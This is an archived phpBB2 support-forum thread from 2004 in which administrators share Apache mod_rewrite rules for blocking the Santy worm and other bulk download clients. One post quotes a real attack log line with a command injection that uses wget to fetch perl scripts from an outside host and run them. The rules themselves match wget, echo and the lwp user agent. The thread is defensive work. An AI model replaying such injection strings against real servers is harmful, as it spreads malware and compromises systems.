Apache forbidden rule for Santy.A worm

This is an archive of the phpBB 2.0.x support forum. Support for phpBB2 has now ended.
Forum rules
Following phpBB2's EoL, this forum is now archived for reference purposes only.
Please see the following announcement for more information: viewtopic.php?f=14&t=1385785
Locked
User avatar
tanrek
Registered User
Posts: 219
Joined: Mon Sep 27, 2004 1:46 pm
Location: Germany, Offenbach
Contact:

Post by tanrek » Mon Dec 27, 2004 9:49 am

pengrus wrote:

Code: Select all

RewriteEngine On
RewriteCond %{QUERY_STRING} ^(.*)wget\%20 [OR]
RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)esystem(.*) [OR]
I am trying to implement this to our system. But could someone explain what the above codes do?


That code does nothing because it's not complete. The complete code could be (filters all worm attacks on my system at this moment = ca. 150000 per day!):

Code: Select all

RewriteEngine On
RewriteCond %{QUERY_STRING} ^.*highlight=\%2527 [OR]
RewriteCond %{HTTP_USER_AGENT} ^lwp [NC]
RewriteRule ^.*$ - [F]
If your system allows this rewrite directive your Apache will answer all URLs contaning 'highlight=%2527' and all user agents beginning with 'lwp' or 'LWP' with 410 errors, what can save a lot a bandwidth.

This is not meant to be a protection of your system because hackers or new worms might bypass this trick. It only helps to lower traffic. Also keep in mind that the Rewrite Engine might open new security issues and it should be shut down a soon as possible when these attacks are over.
Last edited by tanrek on Mon Dec 27, 2004 10:02 am, edited 5 times in total.

larsneo
Registered User
Posts: 22
Joined: Thu Mar 14, 2002 2:11 pm

Post by larsneo » Mon Dec 27, 2004 9:55 am

some additions to tighten the security and to lower the traffic:

Code: Select all

RewriteEngine On 

# prevent access from santy webworm a-e
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=\%65\%63\%68 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=echo [OR]
RewriteCond %{QUERY_STRING} ^(.*)wget\%20
RewriteRule ^.*$ http://127.0.0.1/ [R,L]

# prevent pre php 4.3.10 bug
RewriteCond %{HTTP_COOKIE}% s:(.*):\%22test1\%22\%3b
RewriteRule ^.*$ http://127.0.0.1/ [R,L]

# prevent perl user agent (most often used by santy)
RewriteCond %{HTTP_USER_AGENT} ^lwp.* [NC]
RewriteRule ^.*$ http://127.0.0.1/ [R,L]

Narwhal
Registered User
Posts: 1
Joined: Mon Dec 27, 2004 1:43 pm
Location: Medina, Ohio USA
Contact:

Post by Narwhal » Mon Dec 27, 2004 1:52 pm

I want to thank rcardona and The Master for their post. Without them we'd be offline. It was my first phpBB file edit, regular Admin unable to get online.

RonS
I've Been Banned!
Posts: 53
Joined: Fri Feb 01, 2002 7:14 pm

Post by RonS » Mon Dec 27, 2004 6:19 pm

BZebra wrote: If anyone knows how I could rewrite the highlight-links in the forum (removinbg the highlight-part via bbcode.php), please let me know!!

BZebra
This topic will show you how to remove the highlight code from your viewtopic.php and/or search.php, if I understand your question correctly.

http://www.phpbb.com/phpBB/viewtopic.ph ... 86#1366686

Good luck.

GertDichniksan
Registered User
Posts: 3
Joined: Mon Dec 27, 2004 4:49 pm

Post by GertDichniksan » Mon Dec 27, 2004 6:31 pm

Hi people,

our forum enjoys a high search engine ranking and therefore we were hit hard by the xmas worm wave. We used the usual measures to deal with the requests from infected servers (since we had requests from up to 800 servers at the same time, we used a script that adds attacking servers to iptables in order to keep the logfiles tidy). So far so good!

Some time ago, I noticed requests, that didn't use 'highlight' to issue commands:

Code: Select all

XXX.166.130.120 - - [27/Dec/2004:16:38:23 +0000] "GET /main/forum/viewtopic.php?
t=3668/profile.php?mode=editprofile&sid=http://www.visualcoders.net/spy.gif?
&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.ne
t/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz
.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;per
l%20ownz.txt;perl%20php.txt HTTP/1.1" 200 28949
Question: Is this just non-working code or are there exploitable bugs I'm not aware of?

Cheers
Gert

User avatar
tanrek
Registered User
Posts: 219
Joined: Mon Sep 27, 2004 1:46 pm
Location: Germany, Offenbach
Contact:

Post by tanrek » Mon Dec 27, 2004 6:47 pm

GertDichniksan wrote:

Code: Select all

/main/forum/viewtopic.php?
t=3668/profile.php?mode=editprofile&sid=http://www.visualcoders.net/spy.gif?...
Question: Is this just non-working code or are there exploitable bugs I'm not aware of?


This code was working. The malicious code was downloaded by the above primary script, e.g. as spy.gif (a pearl script !). However, the leak in www.visualcoders.net is shutdown already.

GertDichniksan
Registered User
Posts: 3
Joined: Mon Dec 27, 2004 4:49 pm

Post by GertDichniksan » Mon Dec 27, 2004 7:30 pm

Tanrek,

thanks for your reply. Sorry, I've got to come back to my question!

This code, unlike the thousends of other examples I've seen, uses editprofile instead of viewtopic. I don't understand why the attacker expects this to work!

Cheers

User avatar
tanrek
Registered User
Posts: 219
Joined: Mon Sep 27, 2004 1:46 pm
Location: Germany, Offenbach
Contact:

Post by tanrek » Mon Dec 27, 2004 7:45 pm

GertDichniksan wrote: This code, unlike the thousends of other examples I've seen, uses editprofile instead of viewtopic. I don't understand why the attacker expects this to work!


There is a new generation of worms which attacks all kinds of php scripts and seeks for different vulnerablities. Some of them e.g. try to call wget, but only bloody beginners will have wget lying around in their webspace... At the moment this type of worms uses the user agent string lwp* (see RewriteCond above).
Last edited by tanrek on Mon Dec 27, 2004 8:06 pm, edited 1 time in total.

The_Master
Registered User
Posts: 118
Joined: Fri Dec 28, 2001 2:21 am
Location: Germany

Post by The_Master » Mon Dec 27, 2004 7:47 pm

GertDichniksan wrote: This code, unlike the thousends of other examples I've seen, uses editprofile instead of viewtopic. I don't understand why the attacker expects this to work!


This worm does not only target phpBB. It tries to inject that code into every php script, on any parameter, it can find. Although it (AFAIK) doesn't work on phpBB, there are many php scripts that lack proper check of input parameters and so are vulvernable to these attacks.

So if you use other scripts, you may want to check if they are secure too.

GertDichniksan
Registered User
Posts: 3
Joined: Mon Dec 27, 2004 4:49 pm

Post by GertDichniksan » Mon Dec 27, 2004 9:58 pm

@tenrek & the_master,

thanks!

@tenrek

You don't need lynx or wget to download code from a web server!

Out-of-the-box installations often include gawk. A little bit of inline gawk-code can download a perl script (or a bigger gawk-script).

To switch off command execution from php would be a safer approach.

Cheers
Gert

usrbingeek
Registered User
Posts: 3
Joined: Sun Dec 26, 2004 5:24 pm

Post by usrbingeek » Tue Dec 28, 2004 6:08 pm

This code combines larsneo's and a filter on most popular bandwidth hog clients.

Code: Select all

RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^BlackWidow [OR]
RewriteCond %{HTTP_USER_AGENT} ^Bot\ mailto:craftbot@yahoo.com [OR]
RewriteCond %{HTTP_USER_AGENT} ^ChinaClaw [OR]
RewriteCond %{HTTP_USER_AGENT} ^Custo [OR]
RewriteCond %{HTTP_USER_AGENT} ^DISCo [OR]
RewriteCond %{HTTP_USER_AGENT} ^Download\ Demon [OR]
RewriteCond %{HTTP_USER_AGENT} ^eCatch [OR]
RewriteCond %{HTTP_USER_AGENT} ^EirGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailSiphon [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailWolf [OR]
RewriteCond %{HTTP_USER_AGENT} ^Express\ WebPictures [OR]
RewriteCond %{HTTP_USER_AGENT} ^ExtractorPro [OR]
RewriteCond %{HTTP_USER_AGENT} ^EyeNetIE [OR]
RewriteCond %{HTTP_USER_AGENT} ^FlashGet [OR]
RewriteCond %{HTTP_USER_AGENT} FrontPage [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^GetRight [OR]
RewriteCond %{HTTP_USER_AGENT} ^GetWeb! [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go!Zilla [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go-Ahead-Got-It [OR]
RewriteCond %{HTTP_USER_AGENT} ^GrabNet [OR]
RewriteCond %{HTTP_USER_AGENT} ^Grafula [OR]
RewriteCond %{HTTP_USER_AGENT} ^HMView [OR]
RewriteCond %{HTTP_USER_AGENT} HTTrack [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Stripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^InterGET [OR]
RewriteCond %{HTTP_USER_AGENT} ^Internet\ Ninja [OR]
RewriteCond %{HTTP_USER_AGENT} ^Irvine [OR]
RewriteCond %{HTTP_USER_AGENT} ^JetCar [OR]
RewriteCond %{HTTP_USER_AGENT} ^JOC\ Web\ Spider [OR]
RewriteCond %{HTTP_USER_AGENT} ^larbin [OR]
RewriteCond %{HTTP_USER_AGENT} ^LeechFTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mass\ Downloader [OR]
RewriteCond %{HTTP_USER_AGENT} ^MIDown\ tool [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mister\ PiX [OR]
RewriteCond %{HTTP_USER_AGENT} ^Navroad [OR]
RewriteCond %{HTTP_USER_AGENT} ^NearSite [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetAnts [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Net\ Vampire [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Octopus [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Explorer [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Navigator [OR]
RewriteCond %{HTTP_USER_AGENT} ^PageGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^Papa\ Foto [OR]
RewriteCond %{HTTP_USER_AGENT} ^pavuk [OR]
RewriteCond %{HTTP_USER_AGENT} ^pcBrowser [OR]
RewriteCond %{HTTP_USER_AGENT} ^RealDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^ReGet [OR]
RewriteCond %{HTTP_USER_AGENT} ^SiteSnagger [OR]
RewriteCond %{HTTP_USER_AGENT} ^SmartDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperBot [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperHTTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Surfbot [OR]
RewriteCond %{HTTP_USER_AGENT} ^tAkeOut [OR]
RewriteCond %{HTTP_USER_AGENT} ^Teleport\ Pro [OR]
RewriteCond %{HTTP_USER_AGENT} ^VoidEYE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Image\ Collector [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebAuto [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebCopier [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebFetch [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebGo\ IS [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebLeacher [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebReaper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebSauger [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ eXtractor [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ Quester [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebStripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebWhacker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Wget [OR]
RewriteCond %{HTTP_USER_AGENT} ^Widow [OR]
RewriteCond %{HTTP_USER_AGENT} ^WWWOFFLE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Xaldon\ WebSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Zeus
RewriteRule ^.*$ http://127.0.0.1/ [R,L]

# prevent access from santy webworm a-e
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=\%65\%63\%68 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=echo [OR]
RewriteCond %{QUERY_STRING} ^(.*)wget\%20
RewriteRule ^.*$ http://127.0.0.1/ [R,L]

# prevent pre php 4.3.10 bug
RewriteCond %{HTTP_COOKIE}% s:(.*):\%22test1\%22\%3b
RewriteRule ^.*$ http://127.0.0.1/ [R,L]

# prevent perl user agent (most often used by santy)
RewriteCond %{HTTP_USER_AGENT} ^lwp.* [NC]
RewriteRule ^.*$ http://127.0.0.1/ [R,L]

Xpert
Translator
Posts: 114
Joined: Fri Feb 20, 2004 8:19 pm
Location: Moscow, Russia
Contact:

Post by Xpert » Tue Dec 28, 2004 7:10 pm

Guys, feel free to comment this one:
[RC] Anti-Net-Worm.Perl.Santy
http://www.phpbb.com/phpBB/viewtopic.ph ... 90#1371390

The_Master
Registered User
Posts: 118
Joined: Fri Dec 28, 2001 2:21 am
Location: Germany

Post by The_Master » Tue Dec 28, 2004 7:37 pm

Xpert wrote: Guys, feel free to comment this one:
[RC] Anti-Net-Worm.Perl.Santy
http://www.phpbb.com/phpBB/viewtopic.ph ... 90#1371390


Hmmm: http://www.phpbb.com/phpBB/viewtopic.ph ... 41#1368441

Btw. use "==" or "!=" but not "!==" ;).

Xpert
Translator
Posts: 114
Joined: Fri Feb 20, 2004 8:19 pm
Location: Moscow, Russia
Contact:

Post by Xpert » Tue Dec 28, 2004 7:44 pm

2The_Master
let's discuss the mod at it's thread
!== because strpos needs it.

The_Master
Registered User
Posts: 118
Joined: Fri Dec 28, 2001 2:21 am
Location: Germany

Post by The_Master » Tue Dec 28, 2004 7:52 pm

Xpert wrote: 2The_Master
let's discuss the mod at it's thread


There's nothing to discuss for me, as I'm using my own version of it. Which works quite well here and also stops newer versions of santy, which not (only) try the highlight exploit, too. At least until they learn to mask the user agent ;).
Xpert wrote: !== because strpos needs it.


Ok. Never used strpos() much before, because strstr() seems to be faster on my local machine.

Locked

Return to “2.0.x Support Forum”